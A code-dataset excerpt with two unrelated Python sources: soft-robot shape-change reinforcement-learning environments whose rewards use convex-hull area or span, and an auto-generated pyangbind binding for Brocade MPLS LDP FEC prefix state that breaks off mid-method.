def __init__(self, world):
super().__init__(world)
def reset(self):
super().reset()
# observation
obs = np.concatenate((
self.get_relative_pos_obs("robot"),
))
return obs
### ----------------------------------------------------------------------
# This section of code is modified from the following author
# from https://github.com/RodolfoFerro/ConvexHull
# Author: <NAME>
# Mail: <EMAIL>
# Script: Compute the Convex Hull of a set of points using the Graham Scan
# Function to know if we have a CCW turn
def CCW(self, p1, p2, p3):
if (p3[1]-p1[1])*(p2[0]-p1[0]) >= (p2[1]-p1[1])*(p3[0]-p1[0]):
return True
return False
# Main function:
def jarvis_march(self, S):
n = len(S)
P = [None] * n
l = np.where(S[:,0] == np.min(S[:,0]))
pointOnHull = S[l[0][0]]
i = 0
while True:
P[i] = pointOnHull
endpoint = S[0]
for j in range(1,n):
if (endpoint[0] == pointOnHull[0] and endpoint[1] == pointOnHull[1]) or not self.CCW(S[j],P[i],endpoint):
endpoint = S[j]
i = i + 1
pointOnHull = endpoint
if endpoint[0] == P[0][0] and endpoint[1] == P[0][1]:
break
for i in range(n):
if P[-1] is None:
del P[-1]
return np.array(P)
### ----------------------------------------------------------------------
def convex_poly_area(self, pts_cw):
area = 0
for i in range(len(pts_cw)):
i_1 = i + 1
if i_1 >= len(pts_cw):
i_1 = 0
area += (pts_cw[i,0] * pts_cw[i_1,1] - pts_cw[i_1,0] * pts_cw[i,1])
return 0.5 * area
class MaximizeShape(ShapeBase):
def __init__(self, body, connections=None):
# make world
self.world = EvoWorld.from_json(os.path.join(self.DATA_PATH, 'ShapeChange.json'))
self.world.add_from_array('robot', body, 7, 1, connections=connections)
# init sim
ShapeBase.__init__(self, self.world)
# set action space and observation space
num_actuators = self.get_actuator_indices('robot').size
num_robot_points = self.object_pos_at_time(self.get_time(), "robot").size
self.action_space = spaces.Box(low= 0.6, high=1.6, shape=(num_actuators,), dtype=np.float)
self.observation_space = spaces.Box(low=-100.0, high=100.0, shape=(num_robot_points,), dtype=np.float)
def step(self, action):
# collect pre step information
robot_pos_init = self.object_pos_at_time(self.get_time(), "robot")
# step
done = super().step({'robot': action})
# collect post step information
robot_pos_final = self.object_pos_at_time(self.get_time(), "robot")
# observation
obs = np.concatenate((
self.get_relative_pos_obs("robot"),
))
# compute reward
reward = self.get_reward(robot_pos_init, robot_pos_final)
# error check unstable simulation
if done:
print("SIMULATION UNSTABLE... TERMINATING")
reward -= 3.0
# observation, reward, has simulation met termination conditions, debugging info
return obs, reward, done, {}
def get_reward(self, robot_pos_init, robot_pos_final):
# find convex hull of initial state
convex_hull_init = self.jarvis_march(np.transpose(robot_pos_init))
area_init = self.convex_poly_area(convex_hull_init)
# find convex of final state
convex_hull_final = self.jarvis_march(np.transpose(robot_pos_final))
area_final = self.convex_poly_area(convex_hull_final)
reward = (area_final - area_init) * 10
return reward
class MinimizeShape(ShapeBase):
def __init__(self, body, connections=None):
# make world
self.world = EvoWorld.from_json(os.path.join(self.DATA_PATH, 'ShapeChange.json'))
self.world.add_from_array('robot', body, 7, 1, connections=connections)
# init sim
ShapeBase.__init__(self, self.world)
# set action space and observation space
num_actuators = self.get_actuator_indices('robot').size
num_robot_points = self.object_pos_at_time(self.get_time(), "robot").size
self.action_space = spaces.Box(low= 0.6, high=1.6, shape=(num_actuators,), dtype=np.float)
self.observation_space = spaces.Box(low=-100.0, high=100.0, shape=(num_robot_points,), dtype=np.float)
def step(self, action):
# collect pre step information
robot_pos_init = self.object_pos_at_time(self.get_time(), "robot")
# step
done = super().step({'robot': action})
# collect post step information
robot_pos_final = self.object_pos_at_time(self.get_time(), "robot")
# observation
obs = np.concatenate((
self.get_relative_pos_obs("robot"),
))
# compute reward
reward = self.get_reward(robot_pos_init, robot_pos_final)
# error check unstable simulation
if done:
print("SIMULATION UNSTABLE... TERMINATING")
reward -= 3.0
# observation, reward, has simulation met termination conditions, debugging info
return obs, reward, done, {}
def get_reward(self, robot_pos_init, robot_pos_final):
# find convex hull of initial state
convex_hull_init = self.jarvis_march(np.transpose(robot_pos_init))
area_init = self.convex_poly_area(convex_hull_init)
# find convex of final state
convex_hull_final = self.jarvis_march(np.transpose(robot_pos_final))
area_final = self.convex_poly_area(convex_hull_final)
reward = (area_init - area_final) * 10
return reward
class MaximizeXShape(ShapeBase):
def __init__(self, body, connections=None):
# make world
self.world = EvoWorld.from_json(os.path.join(self.DATA_PATH, 'ShapeChange.json'))
self.world.add_from_array('robot', body, 7, 1, connections=connections)
# init sim
ShapeBase.__init__(self, self.world)
# set action space and observation space
num_actuators = self.get_actuator_indices('robot').size
num_robot_points = self.object_pos_at_time(self.get_time(), "robot").size
self.action_space = spaces.Box(low= 0.6, high=1.6, shape=(num_actuators,), dtype=np.float)
self.observation_space = spaces.Box(low=-100.0, high=100.0, shape=(num_robot_points,), dtype=np.float)
def step(self, action):
# collect pre step information
robot_pos_init = self.object_pos_at_time(self.get_time(), "robot")
# step
done = super().step({'robot': action})
# collect post step information
robot_pos_final = self.object_pos_at_time(self.get_time(), "robot")
# observation
obs = np.concatenate((
self.get_relative_pos_obs("robot"),
))
# compute reward
reward = self.get_reward(robot_pos_init, robot_pos_final)
# error check unstable simulation
if done:
print("SIMULATION UNSTABLE... TERMINATING")
reward -= 3.0
# observation, reward, has simulation met termination conditions, debugging info
return obs, reward, done, {}
def get_reward(self, robot_pos_init, robot_pos_final):
robot_min_pos_init = np.min(robot_pos_init, axis=1)
robot_max_pos_init = np.max(robot_pos_init, axis=1)
robot_min_pos_final = np.min(robot_pos_final, axis=1)
robot_max_pos_final = np.max(robot_pos_final, axis=1)
span_final = (robot_max_pos_final[0] - robot_min_pos_final[0])
span_initial = (robot_max_pos_init[0] - robot_min_pos_init[0])
reward = (span_final - span_initial)
return reward
class MaximizeYShape(ShapeBase):
def __init__(self, body, connections=None):
# make world
self.world = EvoWorld.from_json(os.path.join(self.DATA_PATH, 'ShapeChange.json'))
self.world.add_from_array('robot', body, 7, 1, connections=connections)
# init sim
ShapeBase.__init__(self, self.world)
# set action space and observation space
num_actuators = self.get_actuator_indices('robot').size
num_robot_points = self.object_pos_at_time(self.get_time(), "robot").size
self.action_space = spaces.Box(low= 0.6, high=1.6, shape=(num_actuators,), dtype=np.float)
self.observation_space = spaces.Box(low=-100.0, high=100.0, shape=(num_robot_points,), dtype=np.float)
def step(self, action):
# collect pre step information
robot_pos_init = self.object_pos_at_time(self.get_time(), "robot")
# step
done = super().step({'robot': action})
# collect post step information
robot_pos_final = self.object_pos_at_time(self.get_time(), "robot")
# observation
obs = np.concatenate((
self.get_relative_pos_obs("robot"),
))
# compute reward
reward = self.get_reward(robot_pos_init, robot_pos_final)
# error check unstable simulation
if done:
print("SIMULATION UNSTABLE... TERMINATING")
reward -= 3.0
# observation, reward, has simulation met termination conditions, debugging info
return obs, reward, done, {}
def get_reward(self, robot_pos_init, robot_pos_final):
robot_min_pos_init = np.min(robot_pos_init, axis=1)
robot_max_pos_init = np.max(robot_pos_init, axis=1)
robot_min_pos_final = np.min(robot_pos_final, axis=1)
robot_max_pos_final = np.max(robot_pos_final, axis=1)
span_final = (robot_max_pos_final[1] - robot_min_pos_final[1])
span_initial = (robot_max_pos_init[1] - robot_min_pos_init[1])
reward = (span_final - span_initial)
return reward | en | 0.660936 | # observation ### ---------------------------------------------------------------------- # This section of code is modified from the following author # from https://github.com/RodolfoFerro/ConvexHull # Author: <NAME> # Mail: <EMAIL> # Script: Compute the Convex Hull of a set of points using the Graham Scan # Function to know if we have a CCW turn # Main function: ### ---------------------------------------------------------------------- # make world # init sim # set action space and observation space # collect pre step information # step # collect post step information # observation # compute reward # error check unstable simulation # observation, reward, has simulation met termination conditions, debugging info # find convex hull of initial state # find convex of final state # make world # init sim # set action space and observation space # collect pre step information # step # collect post step information # observation # compute reward # error check unstable simulation # observation, reward, has simulation met termination conditions, debugging info # find convex hull of initial state # find convex of final state # make world # init sim # set action space and observation space # collect pre step information # step # collect post step information # observation # compute reward # error check unstable simulation # observation, reward, has simulation met termination conditions, debugging info # make world # init sim # set action space and observation space # collect pre step information # step # collect post step information # observation # compute reward # error check unstable simulation # observation, reward, has simulation met termination conditions, debugging info | 2.605301 | 3 |
pybind/slxos/v16r_1_00b/mpls_state/ldp/fec/ldp_fec_prefixes/__init__.py | shivharis/pybind | 0 | 10315 | <filename>pybind/slxos/v16r_1_00b/mpls_state/ldp/fec/ldp_fec_prefixes/__init__.py<gh_stars>0
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import prefix
import key
class ldp_fec_prefixes(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls-operational - based on the path /mpls-state/ldp/fec/ldp-fec-prefixes. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description:
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__tot_no_of_prefix_fec','__tot_no_of_prefix_fec_installed','__tot_no_of_prefix_fec_filtered','__tot_no_of_prefix_fec_lwd','__filtered','__prefix_filtered','__prefix','__key',)
_yang_name = 'ldp-fec-prefixes'
_rest_name = 'ldp-fec-prefixes'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__prefix_filtered = YANGDynClass(base=unicode, is_leaf=True, yang_name="prefix-filtered", rest_name="prefix-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
self.__tot_no_of_prefix_fec_installed = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-installed", rest_name="tot-no-of-prefix-fec-installed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__tot_no_of_prefix_fec = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec", rest_name="tot-no-of-prefix-fec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__prefix = YANGDynClass(base=YANGListType("destination",prefix.prefix, yang_name="prefix", rest_name="prefix", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='destination', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}), is_container='list', yang_name="prefix", rest_name="prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
self.__tot_no_of_prefix_fec_lwd = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-lwd", rest_name="tot-no-of-prefix-fec-lwd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
self.__key = YANGDynClass(base=key.key, is_container='container', presence=False, yang_name="key", rest_name="key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-key-key-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__filtered = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'filtered': {'value': 1}, u'filtered-in': {'value': 2}, u'filtered-out': {'value': 3}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='fec-filter-type', is_config=False)
self.__tot_no_of_prefix_fec_filtered = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-filtered", rest_name="tot-no-of-prefix-fec-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mpls-state', u'ldp', u'fec', u'ldp-fec-prefixes']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'mpls-state', u'ldp', u'fec', u'ldp-fec-prefixes']
def _get_tot_no_of_prefix_fec(self):
"""
Getter method for tot_no_of_prefix_fec, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec (uint32)
YANG Description: tot_no_of_prefix_fec
"""
return self.__tot_no_of_prefix_fec
def _set_tot_no_of_prefix_fec(self, v, load=False):
"""
Setter method for tot_no_of_prefix_fec, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_tot_no_of_prefix_fec is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tot_no_of_prefix_fec() directly.
YANG Description: tot_no_of_prefix_fec
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec", rest_name="tot-no-of-prefix-fec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tot_no_of_prefix_fec must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec", rest_name="tot-no-of-prefix-fec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__tot_no_of_prefix_fec = t
if hasattr(self, '_set'):
self._set()
def _unset_tot_no_of_prefix_fec(self):
self.__tot_no_of_prefix_fec = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec", rest_name="tot-no-of-prefix-fec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_tot_no_of_prefix_fec_installed(self):
"""
Getter method for tot_no_of_prefix_fec_installed, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_installed (uint32)
YANG Description: tot_no_of_prefix_fec_installed
"""
return self.__tot_no_of_prefix_fec_installed
def _set_tot_no_of_prefix_fec_installed(self, v, load=False):
"""
Setter method for tot_no_of_prefix_fec_installed, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_installed (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_tot_no_of_prefix_fec_installed is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tot_no_of_prefix_fec_installed() directly.
YANG Description: tot_no_of_prefix_fec_installed
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-installed", rest_name="tot-no-of-prefix-fec-installed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tot_no_of_prefix_fec_installed must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-installed", rest_name="tot-no-of-prefix-fec-installed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__tot_no_of_prefix_fec_installed = t
if hasattr(self, '_set'):
self._set()
def _unset_tot_no_of_prefix_fec_installed(self):
self.__tot_no_of_prefix_fec_installed = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-installed", rest_name="tot-no-of-prefix-fec-installed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_tot_no_of_prefix_fec_filtered(self):
"""
Getter method for tot_no_of_prefix_fec_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_filtered (uint32)
YANG Description: tot_no_of_prefix_fec_filtered
"""
return self.__tot_no_of_prefix_fec_filtered
def _set_tot_no_of_prefix_fec_filtered(self, v, load=False):
"""
Setter method for tot_no_of_prefix_fec_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_filtered (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_tot_no_of_prefix_fec_filtered is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tot_no_of_prefix_fec_filtered() directly.
YANG Description: tot_no_of_prefix_fec_filtered
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-filtered", rest_name="tot-no-of-prefix-fec-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tot_no_of_prefix_fec_filtered must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-filtered", rest_name="tot-no-of-prefix-fec-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__tot_no_of_prefix_fec_filtered = t
if hasattr(self, '_set'):
self._set()
def _unset_tot_no_of_prefix_fec_filtered(self):
self.__tot_no_of_prefix_fec_filtered = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-filtered", rest_name="tot-no-of-prefix-fec-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_tot_no_of_prefix_fec_lwd(self):
"""
Getter method for tot_no_of_prefix_fec_lwd, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_lwd (uint32)
YANG Description: tot_no_of_prefix_fec_lwd
"""
return self.__tot_no_of_prefix_fec_lwd
def _set_tot_no_of_prefix_fec_lwd(self, v, load=False):
"""
Setter method for tot_no_of_prefix_fec_lwd, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/tot_no_of_prefix_fec_lwd (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_tot_no_of_prefix_fec_lwd is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tot_no_of_prefix_fec_lwd() directly.
YANG Description: tot_no_of_prefix_fec_lwd
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-lwd", rest_name="tot-no-of-prefix-fec-lwd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """tot_no_of_prefix_fec_lwd must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-lwd", rest_name="tot-no-of-prefix-fec-lwd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__tot_no_of_prefix_fec_lwd = t
if hasattr(self, '_set'):
self._set()
def _unset_tot_no_of_prefix_fec_lwd(self):
self.__tot_no_of_prefix_fec_lwd = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="tot-no-of-prefix-fec-lwd", rest_name="tot-no-of-prefix-fec-lwd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_filtered(self):
"""
Getter method for filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/filtered (fec-filter-type)
YANG Description: Filter Type
"""
return self.__filtered
def _set_filtered(self, v, load=False):
"""
Setter method for filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/filtered (fec-filter-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_filtered is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_filtered() directly.
YANG Description: Filter Type
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'filtered': {'value': 1}, u'filtered-in': {'value': 2}, u'filtered-out': {'value': 3}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='fec-filter-type', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """filtered must be of a type compatible with fec-filter-type""",
'defined-type': "brocade-mpls-operational:fec-filter-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'filtered': {'value': 1}, u'filtered-in': {'value': 2}, u'filtered-out': {'value': 3}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='fec-filter-type', is_config=False)""",
})
self.__filtered = t
if hasattr(self, '_set'):
self._set()
def _unset_filtered(self):
self.__filtered = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'filtered': {'value': 1}, u'filtered-in': {'value': 2}, u'filtered-out': {'value': 3}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='fec-filter-type', is_config=False)
def _get_prefix_filtered(self):
"""
Getter method for prefix_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix_filtered (string)
YANG Description: filter name
"""
return self.__prefix_filtered
def _set_prefix_filtered(self, v, load=False):
"""
Setter method for prefix_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix_filtered (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_prefix_filtered is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_prefix_filtered() directly.
YANG Description: filter name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="prefix-filtered", rest_name="prefix-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """prefix_filtered must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="prefix-filtered", rest_name="prefix-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__prefix_filtered = t
if hasattr(self, '_set'):
self._set()
def _unset_prefix_filtered(self):
self.__prefix_filtered = YANGDynClass(base=unicode, is_leaf=True, yang_name="prefix-filtered", rest_name="prefix-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_prefix(self):
"""
Getter method for prefix, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix (list)
"""
return self.__prefix
def _set_prefix(self, v, load=False):
"""
Setter method for prefix, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_prefix is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_prefix() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("destination",prefix.prefix, yang_name="prefix", rest_name="prefix", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='destination', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}), is_container='list', yang_name="prefix", rest_name="prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """prefix must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("destination",prefix.prefix, yang_name="prefix", rest_name="prefix", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='destination', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}), is_container='list', yang_name="prefix", rest_name="prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
})
self.__prefix = t
if hasattr(self, '_set'):
self._set()
def _unset_prefix(self):
